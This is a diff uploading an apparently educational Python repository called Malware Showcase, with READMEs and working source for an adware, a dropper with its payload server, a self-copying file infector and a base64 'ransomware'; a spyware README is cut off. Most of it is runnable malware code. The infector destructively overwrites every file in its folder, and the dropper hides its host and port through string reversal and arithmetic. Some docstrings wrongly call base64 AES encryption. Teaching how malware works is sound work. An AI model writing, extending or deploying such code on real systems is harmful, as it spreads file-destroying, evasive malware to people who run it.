Upload folder using huggingface_hub

.gitignore

@@ -0,0 +1 @@
+virtualenv

LICENSE

@@ -0,0 +1,22 @@
+Copyright (c) 2019 Patrik Holop
+
+Permission is hereby granted, free of charge, to any person
+obtaining a copy of this software and associated documentation
+files (the "Software"), to deal in the Software without
+restriction, including without limitation the rights to use,
+copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the
+Software is furnished to do so, subject to the following
+conditions:
+
+The above copyright notice and this permission notice shall be
+included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
+OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
+HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
+WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
+OTHER DEALINGS IN THE SOFTWARE.

README.md

@@ -0,0 +1,48 @@
+![license](https://img.shields.io/badge/License-MIT-green)
+![version](https://img.shields.io/badge/Version-1.1-blue)
+![dev](https://img.shields.io/badge/Dev-Python3-brightgreen)
+![types](https://img.shields.io/badge/Malware%20Types-7%20-red)
+
+# Malware Showcase
+
+<img align="middle" src="https://github.com/PatrikH0lop/malware_showcase/blob/master/logo.svg">
+
+This repository contains explanatory examples of malicious behavior like _file infection_ or _remote code execution_. It's supposed to demonstrate and explain 
+the nature of malicious software with practical examples in Python.
+
+**Note:** _This repository contains examples of malicious files. It should be used for educational purposes only. Usage of files in this repository for any other purpose might cause you legal issues, even though the provided examples are very simple. It is advised to follow the instructions._
+
+### Showcase structure
+
+- **File infector** - This kind of malware infects other files. Common example of such behavior is _code injection_. Malicious code is injected into targeted files and might be later executed. This allows the file infectors to spread. The purpose of their payload might differ, from harmless to destructive behavior.
+  - [Simple file infector in Python (with explanation)](https://github.com/PatrikH0lop/malware_showcase/tree/master/file_infection)
+- **Trojan (trojan horse)** - This kind of malware tries to look like a legitimate software and the malicious activity is hidden from the victim. Common example of such behaviour is _spying on victims_. Trojans can be more precisely classified by a purpose of the malicious segment. They were named after the Greek story, in which the city of Troy has accepted a statue of wooden horse as a gift from their enemies, while the enemy soldiers were hidden inside.
+  - [Simple trojan in Python (with explanation)](https://github.com/PatrikH0lop/malware_showcase/tree/master/trojan)
+- **Worm** - This kind of malware tries to spread on the network and does not need a host file to spread. Worms might contain malicious payload and execute commands on the compromised systems or just consume the network bandwidth to jam the communication.
+  - [Simple worm in Python (with explanation)](https://github.com/PatrikH0lop/malware_showcase/tree/master/worm)
+- **Spyware** - This kind of malware tries to spy on the victim and steal his or her data. There exist various ways of spying on the victim, for example scanning the pressed keys on the keyboard. In comparison with the trojan horse, spyware stays often hidden from the sight of the victim. 
+  - [Simple keylogger in Python (with explanation)](https://github.com/PatrikH0lop/malware_showcase/tree/master/spyware)
+- **Ransomware** - This kind of malware tries to encrypt your files or even restrict your access to the system until a financial ransom is paid. It might continuously remove your files to increase the threat and force you to submit. Ransomwares became very popular in the recent years.
+  - [Simple ransomware in Python (with explanation)](https://github.com/PatrikH0lop/malware_showcase/tree/master/ransomware)
+- **Adware** - This kind of malware tries to aggressively show ads to the victims. Usually it is just an annoying software that does not have any harmful intentions. Adware might try various methods to make the advertising more persistent.
+  - [Simple adware in Python (with explanation)](https://github.com/PatrikH0lop/malware_showcase/tree/master/adware)
+- **Dropper** - This kind of malware attemps to download or dump malicious code to the target system. The malware can be secretly embedded in the dropper itself or downloaded from a remote server. It often tries to avoid detection by obfuscation and encryption.
+  - [Simple dropper in Python (with explanation)](https://github.com/PatrikH0lop/malware_showcase/tree/master/dropper)
+
+### Installation
+
+Make sure that you have installed [Python3](https://www.python.org/download/), system package `python3-dev` and Python package `wheel`. 
+```console
+sudo apt install python3-dev
+pip3 install wheel
+python3 setup.py bdist_wheel  # You might need to run this command as well.
+```
+
+To setup a virtual environment, run the following command:
+```console
+source setup_env.sh
+```
+Or you can install required Python packages listed in `requirements.txt` on your own.
+If something goes wrong during the installation, the script should provide you information 
+about possible failures. You can then focus on the problematic steps in `setup_env.sh` and
+fix the problem. 

adware/README.md

@@ -0,0 +1,46 @@
+# Adware
+
+Adware is usually the least harmful type of malware, because it tries to promote some products and force the user to see advertisements in many ways, for example in the web browser every time the user loads a website. Our adware shows three annoying popup windows on the screen promoting various products.
+
+#### Demonstration of behavior
+
+We don't need any specific preparation before an execution of the adware (`./adware.py`). Immediately after the execution we can see three popup windows showing advertisements on our screen. This might be annoying and still relatively fine, but when we press the close button on any popup window, nothing happens and the ad is still shown on the screen.
+
+Creation of basic **adware** is very simple process as it is described below. That's why you should be always cautious when executing uncommon or not trusted files.
+
+#### How does it work
+
+- Firstly, we create our **adware** and pass it arguments from the system. Because we need a proper GUI,
+  we are using Python module called [PySide2](https://pypi.org/project/PySide2/). To learn more about GUI programming, see [the guide to GUI programming in Python](https://wiki.qt.io/Qt_for_Python). Our class **Adware** inherits from the **QApplication** and represents main QT application.
+  ```python
+  adware = Adware(sys.argv)
+  ```
+- We call the method _show_ads()_, which creates dialog popups and pass the references to these forms to variable in main module `windows`. It is important not to loose reference to those windows, because otherwise they will not be shown on the screen.
+  ```python
+  windows = adware.show_ads()
+  ```
+- Our adware has a property **advert_slogans**, which represents a list of ad slogans we want our victim
+  to see. For each of those slogans we want to create a unique popup window by calling the method _create_ad_window()_. 
+  ```python
+  ad_windows = []
+  for advert in self.advert_slogans:
+      # Create a new ad window.
+      ad_window = self.create_ad_window(advert)
+  ```
+- Because these windows would popup on the same place on the screen and overlap each other, we need to move the created popup windows to random location on the screen. 
+  ```python
+   # Move this window to random location on screen.
+   x_coordinate, y_coordinate = random.randint(1, 800), random.randint(1, 600)
+   ad_window.move(x_coordinate, y_coordinate)
+  ```
+- To create a popup windows, our function _create_ad_window_ creates a new **AdWindow** with the given slogan. To show the window on the screen, we must call the method _show_.
+  ```python
+  window = AdWindow(ad_slogan=ad_slogan)
+  window.show()
+  ```
+- The popup window called **AdWindow** inherits from **QDialog** and represents independent window with
+layout containing only one label showing the ad. However, to make adware more annoying and show ads more aggressively, we set the window to ignore close signal when the victim presses close button. When this happens, the window obtaines information about a new event called **closeEvent**. We will simply ignore any action so the window stays on the screen.
+  ``` python
+  def closeEvent(self, event):
+      event.ignore()
+  ```

adware/adware.py

@@ -0,0 +1,82 @@
+#!/usr/bin/env python3
+
+""" Implementation of simple adware that pops multiple
+windows with the advertisements.
+"""
+
+import logging
+import sys
+import random
+
+from PySide2.QtWidgets import QApplication, QDialog, QLabel, QVBoxLayout
+
+
+class AdWindow(QDialog):
+    """ This class represents ad window shown on the screen. """
+
+    def __init__(self, ad_slogan, parent=None):
+        super(AdWindow, self).__init__(parent)
+        self.setWindowTitle("Advertisement!")
+
+        # Create a layout so that the ad slogan is shown.
+        self.label = QLabel(ad_slogan)
+        layout = QVBoxLayout()
+        layout.addWidget(self.label)
+
+        self.setLayout(layout)
+
+    def closeEvent(self, event):
+        # Ignore the close event so that the ad
+        # can't be closed by pressing close button.
+        event.ignore()
+
+
+class Adware(QApplication):
+    """ This class represents implementation of adware. """
+
+    def __init__(self, args):
+        super(Adware, self).__init__(args)
+
+    @property
+    def advert_slogans(self):
+        """ Slogans of the promoted adds. """
+        return (
+            'Buy the milk in the milk shops!',
+            'Buy the clothes in the wool shops!',
+            'Buy the food in the food shops!'
+        )
+
+    def create_ad_window(self, ad_slogan):
+        """ Creates a windows showing the advertisement
+        slogan.
+
+        :param str ad_slogan: Text of the ad.
+        """
+        window = AdWindow(ad_slogan=ad_slogan)
+        window.show()
+        return window
+
+    def show_ads(self):
+        """ Creates the main GUI application and shows
+        the ads based on `:class:~Adware.advert_slogans`
+        """
+        ad_windows = []
+        for advert in self.advert_slogans:
+            # Create a new ad window.
+            ad_window = self.create_ad_window(advert)
+            # Move this window to random location on screen.
+            x_coordinate, y_coordinate = random.randint(1, 800), random.randint(1, 600)
+            ad_window.move(x_coordinate, y_coordinate)
+            ad_windows.append(ad_window)
+
+        return ad_windows
+
+
+if __name__ == '__main__':
+    logging.basicConfig(level=logging.DEBUG)
+
+    # Create our adware and show the ads.
+    adware = Adware(sys.argv)
+    windows = adware.show_ads()
+
+    sys.exit(adware.exec_())

dropper/README.md

@@ -0,0 +1,111 @@
+# Dropper
+
+Our **dropper** is implemented in the file `dropper.py`. It tries to download some malicious code from a remote server and ideally avoid any detection. The server is implemented in the file `server.py` and sends the malicious payload to the targeted system as soon as the dropper requests a connection. Received payload is dumped into the file and the malware was successfully delivered.
+
+#### Demonstration of behavior
+
+The first thing that the attacker must do is to set up a server that distributes malware to its clients. Therefore, we will set up a running server on our computer by running `./server.py`. You should see the following text:
+```
+DEBUG:user:Server was successfully initialized.
+```
+In the second console, execute the **dropper** as a victim with the command `./dropper.py`. We should immediately see the following text on the attacker's console:
+```
+Connection with dropper established from ('127.0.0.1', 46682)
+```
+and the server shuts down. This means that our client has successfully connected to our server.
+
+To verify that the dropper has served its purpose, list the directory where the dropper is located and you will see that a new file `malware.py` has been created. For demostration purposes, the "malicious" code is just a simple command to print short text. Execute the file by running `python malware.py`. After doing so, you should see the following text:
+```
+Hello there
+```
+
+Creation of basic **dropper** is very simple process as it is described below and anyone can do it just with the basic knowledge of programming and understandment of operating systems. That's why we should be always cautious when we execute any uncommon or not trusted file.
+
+#### How does it work?
+
+##### Server
+
+- Firstly, we create our **server** that should send malicious code to a running **dropper** client executed
+  by the victim. The server will listen on the specific port that must be the same as is the one used by our **dropper**.
+  In this example, both the **server** and **dropper** will be executed on the same computer, but the
+  **server** might be remote and located anywhere in the world.
+  ```python
+  server = Server(27000)
+  ```
+  Communication is realized via **TCP** protocol specified by `socket.SOCK_STREAM` (To learn more about network protocols see [the guide to network communication](https://support.holmsecurity.com/hc/en-us/articles/212963869-What-is-the-difference-between-TCP-and-UDP-). <br>
+  ```python
+  self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+  ```
+
+- Then we need to initialize the server by binding it to the specified port.
+  ```python
+  server.initialize()
+  ```
+- We can observe the malicious command that should be send to the dropper. In this case, it's just a simple command to print some text.
+  ```python
+  @property
+  def malware_code(self):
+      return b'print("Hello there")'
+  ```
+- The most important part is the connection with the victim. This is implemented in the _send_malicious_code_  function provided by the **server**. It waits for the connection initiated by the **dropper** after its execution on the victim's system. It then simply sends the payload and terminates the connection.
+  ```python
+    with connection:
+        print('Connection with dropper established from {}'.format(address))
+        # Send data to the client and close the server.
+        encoded_payload = base64.b64encode(self.malicious_code)
+        connection.send(encoded_payload)
+  ```
+- The first attempt to prevent detection is coming and it's encryption of the malicious code. What if someone sees everything we send over the network? If so, our malicious code might be detected immediately and  communication stopped or the victim will be notified. That's why we use at least some layer of encryption. For demonstration, we can use basic encoding **base64**. To learn more about **base64** see [the guide to base64](https://blogs.oracle.com/rammenon/base64-explained).
+  ```python
+  encoded_payload = base64.b64encode(self.malicious_code)
+  ```
+
+##### Dropper (client)
+
+- Firstly, we must initialize our **dropper**. This service requires a name of the host (server) and the
+  specified port for communication. A host named `localhost` means that the server is listening on the same
+  system as our client. A second attempt is made to avoid detection. What if someone glanced over the code of our dropper and spots some suspicious address? Or maybe our victim scans the files for possible port numbers and if the number `27000` is displayed, they might suspect something. We have to hide this data somehow, so we pass some innocent looking arguments.
+
+  ```python
+  dropper = Dropper('tsoh', 'lacol', 729000000)
+  ```
+- If someone inspects the code, they can see the methods for network communication. However, based on the arguments passed to our dropper it's not clear with whom and which port will be used (maybe `729000000`?). We can construct the necessary connection attributes dynamically during runtime. Method _decode\_hostname_ takes two strings, switches their order and reserses them. From the first two arguments passed to our dropper we suddenly get the string `localhost`. And to get the port, we can simply calculate the square root from the last argument. Easy to do, but harder to detect.
+  ```python
+  def decode_hostname(self, str1, str2):
+      """ Constructs the hostname of remote server. """
+      return str2[::-1] + str1[::-1]
+
+  def decode_port(self, port):
+      """Constructs the port of remote server. """
+      return int(math.sqrt(port))
+  ```
+
+- Now, we try to connect to the server. This connection should remain hidden from the victim. The logged message is presented only so that we can detect any errors in our example.
+  ```python
+  try:
+      self.socket.connect((self.host, self.port))
+  except socket.error:
+      logging.debug('Dropper could not connect to the server.')
+      return
+  ```
+
+- Then the **dropper** tries to greet the victim as a harmless program.
+   ```python
+   # Try to act as an ordinary application.
+   print(
+       'Hello, this is a totally ordinary app. '
+       'I\'m surely not doing anything malicous'
+   )
+   ```
+-  In the meantime, the client will try to receive the malicious code from the remote server. Remember that the data are encrypted using Base64, so we have to decode them and we have successfully downloaded the malware.
+   ```python
+   # Receive the malicious code in the encrypted form.
+   command = self.socket.recv(1000)
+   # Decode the malicious payload and dump it into a file.
+   decode_payload = base64.b64decode(command)
+   ```
+- The last thing left is to either execute the retrieved code or simply write it into a file. The payload was successfully delivered to the target system by doing so.
+  ```python
+  with open('malware.py', 'wb') as file:
+      file.write(data)
+  ```

dropper/dropper.py

@@ -0,0 +1,91 @@
+#!/usr/bin/env python3
+
+""" Implementation of dropper that downloads malicious code from the server
+    and dumps it into a file.
+"""
+
+import base64
+import logging
+import socket
+import math
+
+
+class Dropper:
+    """ This class represents the implementation of dropper.
+    """
+
+    def __init__(self, host1, host2, number):
+        # Construct hostname of the remote server from the first two
+        # arguments.
+        self._host = self.decode_hostname(host1, host2)
+        # Calculate the port number from the last argument.
+        self._port = self.decode_port(number)
+        # Initialize socket for the connection.
+        self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    @property
+    def host(self):
+        """ Server that sends us the malicious code. """
+        return self._host
+
+    @host.setter
+    def host(self, new_host):
+        self._host = new_host
+
+    def decode_hostname(self, str1, str2):
+        """ Returns hostname of the remote server. """
+        return str2[::-1] + str1[::-1]
+
+    @property
+    def port(self):
+        """ Port, on which the server runs (`int`). """
+        return self._port
+
+    @port.setter
+    def port(self, new_port):
+        self._port = new_port
+
+    def decode_port(self, port):
+        """Returns target port of the remote server. """
+        return int(math.sqrt(port))
+
+    @property
+    def socket(self):
+        """ Client socket. """
+        return self._socket
+
+    def dump_data(self, data):
+        """ Write the retrieved data from the server into the file.
+        """
+        with open('malware.py', 'wb') as file:
+            file.write(data)
+
+    def download_malicious_code(self):
+        """ Download malicious code from the server. """
+        # Create a connection to the server.
+        try:
+            self.socket.connect((self.host, self.port))
+        except socket.error:
+            logging.debug('Dropper could not connect to the server.')
+            return
+
+        # Try to act as an ordinary application.
+        print(
+            'Hello, this is a totally ordinary app. '
+            'I\'m surely not doing anything malicous'
+        )
+
+        # Receive the malicious code in the encrypted form.
+        command = self.socket.recv(1000)
+        # Decode the command and dump it into a file.
+        decode_payload = base64.b64decode(command)
+        self.dump_data(decode_payload)
+
+
+if __name__ == '__main__':
+    logging.basicConfig(level=logging.DEBUG)
+
+    # Initialize dropper application.
+    dropper = Dropper('tsoh', 'lacol', 729000000)
+    # Collect the malicious code and dump it into the file.
+    dropper.download_malicious_code()

dropper/server.py

@@ -0,0 +1,68 @@
+#!/usr/bin/env python3
+
+""" Implementation of the server that sends some malicious code to its
+    dropper client.
+"""
+
+import base64
+import logging
+import socket
+
+
+class Server:
+    """ This class represents a server that stores some malicious payload and sends
+    it to the dropper once the connection is established.
+    """
+
+    def __init__(self, port):
+        self._port = port
+        # Initialize the socket for connection.
+        self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    @property
+    def malicious_code(self):
+        """ Malicious payload. In this case just a demonstrative command. """
+        return b'print("Hello there")'
+
+    @property
+    def port(self):
+        """ Port, on which the server runs (`int`). """
+        return self._port
+
+    @port.setter
+    def port(self, new_port):
+        self._port = new_port
+
+    @property
+    def socket(self):
+        """ Server socket. """
+        return self._socket
+
+    def initialize(self):
+        """ Initialize server before the session. """
+        try:
+            self.socket.bind(('localhost', self._port))
+            self.socket.listen()
+            logging.debug('Server was successfully initialized.')
+        except socket.error:
+            print('Server was not initialized due to an error.')
+
+    def send_malicious_code(self):
+        """ Send malware to the client once the connection is established. """
+        # Establish a connection with the client.
+        connection, address = self.socket.accept()
+        with connection:
+            print('Connection with dropper established from {}'.format(address))
+            # Send data to the client and shut down the server.
+            encoded_payload = base64.b64encode(self.malicious_code)
+            connection.send(encoded_payload)
+
+
+if __name__ == '__main__':
+    logging.basicConfig(level=logging.DEBUG)
+
+    # Create and initialize a server running on attacker's side.
+    server = Server(27000)
+    server.initialize()
+    # Send a payload to the dropper client once it establishes a connection.
+    server.send_malicious_code()

file_infection/README.md

@@ -0,0 +1,52 @@
+# File infection
+
+Our **file infector** is implemented in the file `infector.py`. It infects all files in the same directory with its own code that allows it to spread in the future. When the targeted file is executed, it should perform the same malicious infection on other files as our own **file infector**.
+
+#### Demonstration of behavior
+
+Observe `target_file.ext` before the execution of **file infector**. It is a simple file located in the same directory as our **file infector**. To see the behavior of **file infector**, simply execute it in this folder (```./infector.py```). You should see something like this:
+```
+DEBUG:user:Infecting file: ./target_file.ext
+DEBUG:user:Infecting file: ./infector.py
+INFO:user:Number of infected files: 1
+```
+Our **file infector** has tried to infect every file in this folder, even itself, but has successfully infected only `target_file.ext` (explained below). Now move the infected file into folder `target_folder/` and execute it the same way as we have executed our **file infector** (`./target_file.ext`). You should see similar information as above but this time we have successfully infected `target_file_2.ext` by using the infected `target_file.ext`.
+
+Creation of **file infector** is very simple process as it is described below and anyone can do it just with basic knowledge of programming and understandment of operating systems. That's why we should be always cautious when we execute any uncommon or not trusted file.
+
+#### How does it work?
+
+- Firstly, we create our **file infector** and give it a name. <br>
+  ```python
+  code_injector = FileInfector('SimpleFileInfector')
+  ```
+- Then we must **choose a folder** with files we want to infect. We call function *infect_files_in_folder*
+  that is provided by our **file infector** and pass the path to the folder as an argument. This function 
+  returns the number of infected files. <br>
+   ```python
+  number_infected_files = code_injector.infect_files_in_folder(path)
+  ```
+- The first thing that needs to be done is a lookup for all filenames in the same directory. This implementation ignores _README_ files, because **file infector** would infect this file as well if you execute it.
+- The second step is to check whether the file has been already infected. If you run our **file infector** multiple times, you can see that it ignores files that it has already infected. This might be done by using some sort of mark left in the infected file together with injected code. In this case it is a string `INJECTION SIGNATURE` in the module docstring. Our **file infector** reads the content of the targeted file and if it contains this signature, malware continues with other files. <br>
+  ```python
+  """ Implementation of file infector in Python.
+      INJECTION SIGNATURE 
+  """ 
+  ```
+- Because we expect the injected code to be executed, we must be sure that the targeted file has valid permissions for execution. To learn more about permissions, see [the guide to Linux permissions](https://www.linux.com/learn/understanding-linux-file-permissions).<br>
+  ```python
+  os.chmod(file, 777)
+  ```
+- The last step is to write the code of **our own file** into the targeted file.
+  ```python
+   with open(file, 'w') as infected_file:
+      infected_file.write(self.malicious_code)
+  ```
+- To obtain the **code of our own application**, we can simply read the source file. A name of the file is always passed as the first argument before the execution. We should obtain the name from this argument, because the infected files might have various names and the code should work in all of them. Because _malicious_code_ is a **cached property**, we
+  would access the source file only once.
+  ```python
+  malicious_file = sys.argv[0]
+  with open(malicious_file, 'r') as file:
+      malicious_code = file.read()
+  ```
+ 

file_infection/infector.py

@@ -0,0 +1,95 @@
+#!/usr/bin/env python3
+
+""" Implementation of file infector in Python.
+    INJECTION SIGNATURE
+"""
+
+import logging
+import os
+import sys
+from cached_property import cached_property
+
+
+class FileInfector:
+    """ This class represents the code injecting malware.
+    """
+
+    def __init__(self, name):
+        self._name = name
+
+    @property
+    def name(self):
+        """ Name of the malware. """
+        return self._name
+
+    @name.setter
+    def name(self, new_name):
+        self._name = new_name
+
+    @cached_property
+    def malicious_code(self):
+        """ Malicious code. In the case of this file
+        injector it is this whole file.
+        """
+        # Get the name of this file.
+        malicious_file = sys.argv[0]
+        with open(malicious_file, 'r') as file:
+            malicious_code = file.read()
+
+        return malicious_code
+
+    def infect_files_in_folder(self, path):
+        """ Perform file infection on all files in the
+        given directory specified by path.
+
+        :param str path: Path of the folder to be infected.
+        :returns: Number of injected files (`int`).
+        """
+        num_infected_files = 0
+        # List the directory to get all files.
+        files = []
+        for file in os.listdir(path):
+            # For the demostration purposes ignore README.md
+            # from the repository.
+            if file == 'README.md':
+                continue
+
+            file_path = os.path.join(path, file)
+            if os.path.isfile(file_path):
+                files.append(file_path)
+
+        # Inject each file in the directory.
+        for file in files:
+            logging.debug('Infecting file: {}'.format(file))
+
+            # Read the content of the original file.
+            with open(file, 'r') as infected_file:
+                file_content = infected_file.read()
+            # Check whether the file was already infected by scanning
+            # the injection signature in this file. If so, skip the file.
+            if "INJECTION SIGNATURE" in file_content:
+                continue
+
+            # Ensure that the injected file is executable.
+            os.chmod(file, 777)
+
+            # Write the original and malicous part into the file.
+            with open(file, 'w') as infected_file:
+                infected_file.write(self.malicious_code)
+
+            num_infected_files += 1
+
+        return num_infected_files
+
+
+if __name__ == '__main__':
+    logging.basicConfig(level=logging.DEBUG)
+
+    # Create file injector.
+    code_injector = FileInfector('SimpleFileInfector')
+
+    # Infect all files in the same folder.
+    path = os.path.dirname(os.path.abspath(__file__))
+    number_infected_files = code_injector.infect_files_in_folder(path)
+
+    logging.info('Number of infected files: {}'.format(number_infected_files))

file_infection/target_file.ext

@@ -0,0 +1 @@
+Just a normal file.

file_infection/target_folder/target_file_2.ext

@@ -0,0 +1 @@
+Just a second normal file.

ransomware/README.md

@@ -0,0 +1,68 @@
+# Ransomware
+
+Our **ransomware** is implemented in the file `ransomware.py`. It encrypts all files in the same directory and shows a ransom message, requesting financial amount of 0.1 USD for user to obtain the key. Once the user provides the correct key, it decrypts those files, otherwise they would stay encrypted.
+
+#### Demonstration of behavior
+
+Before the execution of **ransomware** observe `target_file.ext`. It is a simple file located in the same directory as out **ransomware**. To see the behavior of **ransomware**, simple execute it in this folder (`./ransomware`). You should see something like this:
+
+```
+DEBUG:root:Encrypting file: malware_showcase/ransomware/target_file.ext
+Hi, all your files has been encrypted. Please send 0.1 USD on this address
+to get a decryption key: XYZ.
+Number of encrypted files: 1
+Please enter a key:
+```
+
+Now do not type anything, just observe `target_file.ext` in the second terminal. You can see that its original content `Just an ordinary text file.` was encoded to `SnVzdCBhbiBvcmRpbmFyeSB0ZXh0IGZpbGUuCg==` (for the more experienced users it is obvious that it is a simple format of **base64**). However, this **ransomware** assumes that the user does not know the basics of cryptography. Now we have two options as the user. We might guess the key, in which case the program ends and our files stay encrypted, or we "send a payment to the bank address XYZ" and obtain the correct key:
+```
+Please enter a key: __ransomware_key
+```
+This triggers a decryption of data and as we can observe, the content of our file is restored.
+
+Creation of basic **ransomware** is very simple process as it is described below and anyone can do it just with basics in programming and understandment of encryption. That's why we should be always cautious when we execute any uncommon or not trusted files.
+
+#### How does it work?
+
+- Firstly, we create our **ransomware** and give it a name. <br>
+  ```python
+  ransomware = Ransomware('SimpleRansomware')
+  ```
+- Then we must **choose a folder** with files we want to encrypt. We call function *encrypt_files_in_folder* that is provided by our **ransomware** and pass the path to the folder as an argument. This function returns the number encrypted files. <br>
+  ```python
+  number_encrypted_files = ransomware.encrypt_files_in_folder(path)
+  ```
+- The first thing that needs to be done is a lookup for all filenames in the same directory (function _get_files_in_folder(path)_). This implementation ignores _README_ files, because **ransomware** would encrypt also this file as well if you run it.
+- Then we can simple encrypt each found file. The process of encryption is described below.
+  ```python
+  for file in files:
+     logging.debug('Encrypting file: {}'.format(file))
+     self.encrypt_file(file)
+  ```
+ - The encryption part is the most important. There are many ways of how to encrypt the files. Usually 
+ the encryption key would take a part in encryption as well (with much stronger encryption algorithm), but for demonstration we can use basic encoding **base64**. To learn more about **base64** see [the guide to base64](https://blogs.oracle.com/rammenon/base64-explained). In this case we load the data from the file, encrypt them to base64 and then write them back to the file.
+   ```python
+   # Load the content of file.
+   with open(filename, 'r') as file:
+ 	  content = file.read()
+   # Encrypt the file content with base64.
+   encrypted_data = base64.b64encode(content.encode('utf-8'))
+   # Rewrite the file with the encoded content.
+   with open(filename, 'w') as file:
+      file.write(encrypted_data.decode('utf-8'))
+    ```
+ - Once all files are encrypted, we can show our ransom message to the user, requesting money for the key.
+ - The decryption part is very similar to encryption. However, in this case we load the key and compare it with our default key `__ransomware_key`. If they are equal, we simply revert the previously done encryption. If the user enters a different key, the program ends and the files stay encrypted.
+    ```python
+    # Obtain a key from the user.
+    key = self.obtain_key()
+    if key != self.key:
+ 	   print('Wrong key!')
+       return
+
+    files = self.get_files_in_folder(path)
+
+    # Decrypt each file in the directory.
+    for file in files:
+ 	    self.decrypt_file(key, file)
+    ```

ransomware/ransomware.py

@@ -0,0 +1,141 @@
+#!/usr/bin/env python3
+
+""" Implementation of simple ransomware in Python.
+"""
+
+import logging
+import os
+import sys
+import base64
+
+
+class Ransomware:
+    """ This class represents file encrypting ransomware.
+    """
+
+    def __init__(self, name):
+        self._name = name
+
+    @property
+    def name(self):
+        """ Name of the malware. """
+        return self._name
+
+    @name.setter
+    def name(self, new_name):
+        self._name = new_name
+
+    @property
+    def key(self):
+        """ Key used for encryption of data. """
+        return "__ransomware_key"
+
+    def obtain_key(self):
+        """ Obtain key from a user. """
+        return input("Please enter a key: ")
+
+    def ransom_user(self):
+        """ Inform user about encryption of his files. """
+        print(
+            "Hi, all your files has been encrypted. Please "
+            "send 0.1 USD on this address to get decryption"
+            " key: XYZ."
+        )
+
+    def encrypt_file(self, filename):
+        """ Encrypt the given file with AES encryption algoritm.
+        :param str filename: Name of the file.
+        """
+        # Load the content of file.
+        with open(filename, 'r') as file:
+            content = file.read()
+        # Encrypt the file content with base64.
+        encrypted_data = base64.b64encode(content.encode('utf-8'))
+        # Rewrite the file with the encoded content.
+        with open(filename, 'w') as file:
+            file.write(encrypted_data.decode('utf-8'))
+
+    def decrypt_file(self, key, filename):
+        """ Decrypt the given file with AES encryption algoritm.
+        :param str key: Decryption key.
+        :param str filename: Name of the file.
+        """
+        # Load the content of file.
+        with open(filename, 'r') as file:
+            content = file.read()
+        # Decrypt the file content.
+        decrypted_data = base64.b64decode(content)
+        # Rewrite the file with the encoded content.
+        with open(filename, 'w') as file:
+            content = file.write(decrypted_data.decode('utf-8'))
+
+    def get_files_in_folder(self, path):
+        """ Returns a `list` of all files in the folder.
+
+        :param str path: Path to the folder
+        """
+        # List the directory to get all files.
+        files = []
+        for file in os.listdir(path):
+            # For the demostration purposes ignore README.md
+            # from the repository and this file.
+            if file == 'README.md' or file == sys.argv[0]:
+                continue
+
+            file_path = os.path.join(path, file)
+            if os.path.isfile(file_path):
+                files.append(file_path)
+
+        return files
+
+    def encrypt_files_in_folder(self, path):
+        """ Encrypt all files in the given directory specified
+        by path.
+
+        :param str path: Path of the folder to be encrypted.
+        :returns: Number of encrypted files (`int`).
+        """
+        num_encrypted_files = 0
+        files = self.get_files_in_folder(path)
+
+        # Encrypt each file in the directory.
+        for file in files:
+            logging.debug('Encrypting file: {}'.format(file))
+            self.encrypt_file(file)
+            num_encrypted_files += 1
+
+        self.ransom_user()
+
+        return num_encrypted_files
+
+    def decrypt_files_in_folder(self, path):
+        """ Decrypt all files in the given directory specified
+        by path.
+
+        :param str path: Path of the folder to be decrypted.
+        """
+        # Obtain a key from the user.
+        key = self.obtain_key()
+        if key != self.key:
+            print('Wrong key!')
+            return
+
+        files = self.get_files_in_folder(path)
+
+        # Decrypt each file in the directory.
+        for file in files:
+            self.decrypt_file(key, file)
+
+
+if __name__ == '__main__':
+    logging.basicConfig(level=logging.DEBUG)
+
+    # Create ransomware.
+    ransomware = Ransomware('SimpleRansomware')
+
+    # Encrypt files located in the same folder as our ransomware.
+    path = os.path.dirname(os.path.abspath(__file__))
+    number_encrypted_files = ransomware.encrypt_files_in_folder(path)
+    print('Number of encrypted files: {}'.format(number_encrypted_files))
+
+    ransomware.decrypt_files_in_folder(path)

ransomware/target_file.ext

@@ -0,0 +1 @@
+Just an ordinary text file.

requirements.txt

@@ -0,0 +1,6 @@
+scp==0.13.2
+pyxhook==1.0.0
+cached_property==1.5.1
+paramiko==2.4.2
+PySide2==5.13.0
+python_daemon==2.2.3

setup_env.sh

@@ -0,0 +1,34 @@
+#!/bin/sh
+# This script automates the creation of Python virtual environment.
+
+if [ -d "virtualenv" ]; then
+    echo "Virtual environment 'virtualenv' found, activating it."
+else
+    echo "Virtual environment not found, creating new 'virtualenv'."
+    python3 -m venv virtualenv
+    if [ $? -eq 0 ]; then
+        echo "Virtual environment was successfully created."
+    else
+        echo "Virtual environment was NOT created, aborting."
+        exit 1
+    fi
+fi
+
+source virtualenv/bin/activate
+if [ $? -eq 0 ]; then
+    echo "Virtual environment is successfully activated."
+else
+    echo "Virtual environment was NOT activated, aborting."
+    exit 1
+fi
+
+echo "Installing required packages."
+pip3 install -r requirements.txt
+if [ $? -eq 0 ]; then
+    echo "All requirements were successfully installed."
+else
+    echo "Requirements were NOT installed properly, aborting."
+    exit 1
+fi
+
+echo "Done."

spyware/README.md

@@ -0,0 +1,64 @@
+# Spyware
+
+There exist many ways of spying on the victim. Our **spyware** is represented by **keylogger**, a simple program that monitors pressed keys on the keyboard and can see everything you type. This **keylogger** is implemented in the file `keylogger.py`.
+
+#### Demonstration of behavior
+
+We don't need any specific preparation before an execution of the keylogger (`./keylogger.py`). We can observe that after the execution nothing happened and we can type new commands, just like in the case of us pressing only the key `Enter`. Now you can do on your system anything you want. For the demonstration you can open a browser and type something like `Passwd` representing your potential password, just like you would do on any login page of your social media.
+
+You can now spot that in the same folder as our **keylogger** is located a new file `activity.log`. By observing the file your can see that it contains all keys you have pressed on your keyboard after the execution, including your password `Passwd`. Attacker can easily access those file and modify the keylogger to send them on specific e-mail address or with a combination with different kind of malware he might gain direct access to them via network.
+
+```
